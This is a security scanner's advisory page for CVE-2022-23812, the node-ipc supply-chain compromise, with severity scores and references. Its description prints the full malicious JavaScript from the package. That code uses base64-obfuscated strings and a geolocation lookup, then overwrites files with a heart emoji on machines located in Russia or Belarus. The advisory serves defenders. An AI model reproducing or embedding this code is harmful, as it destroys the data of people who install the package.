SCA: security update for node-ipc (GHSA-97m3-w2cp-4xx6)

critical Tenable Self-Hosted Container Security Plugin ID 413115

Description

There are packages installed that are affected by a vulnerability referenced in the following CVE:

- This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code,
that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji.
**Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this
package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious
Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https";
setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.
from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=
", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=",
"base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f =
Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e =
Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s =
JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a =
u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or
Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8"));
h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n =
"", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {}
const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i =
u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) {
const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try {
a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return
f; } const ssl = true; export { ssl as default, ssl }; (CVE-2022-23812)

See Also

https://github.com/advisories/GHSA-97m3-w2cp-4xx6

Plugin Details

Severity: Critical

ID: 413115

Version: Revision 1.13

Type: Local

Family: SCA Checks

Published: 1/23/2025

Updated: 7/2/2026

Supported Sensors: Tenable Cloud Security, Tenable Self-Hosted Container Security

Risk Information

VPR

Risk Factor: Critical

Score: 9.5

Percentile: 99.86

Vendor

Vendor Severity: Critical

CVSS v2

Risk Factor: Critical

Base Score: 10

Temporal Score: 8.7

Vector: CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS Score Source: CVE-2022-23812

CVSS v3

Risk Factor: Critical

Base Score: 9.8

Temporal Score: 9.4

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Temporal Vector: CVSS:3.0/E:H/RL:O/RC:C

Vulnerability Information

Exploit Available: true

Exploit Ease: Exploits are available

Patch Publication Date: 3/16/2022

Vulnerability Publication Date: 3/16/2022

Reference Information

CVE: CVE-2022-23812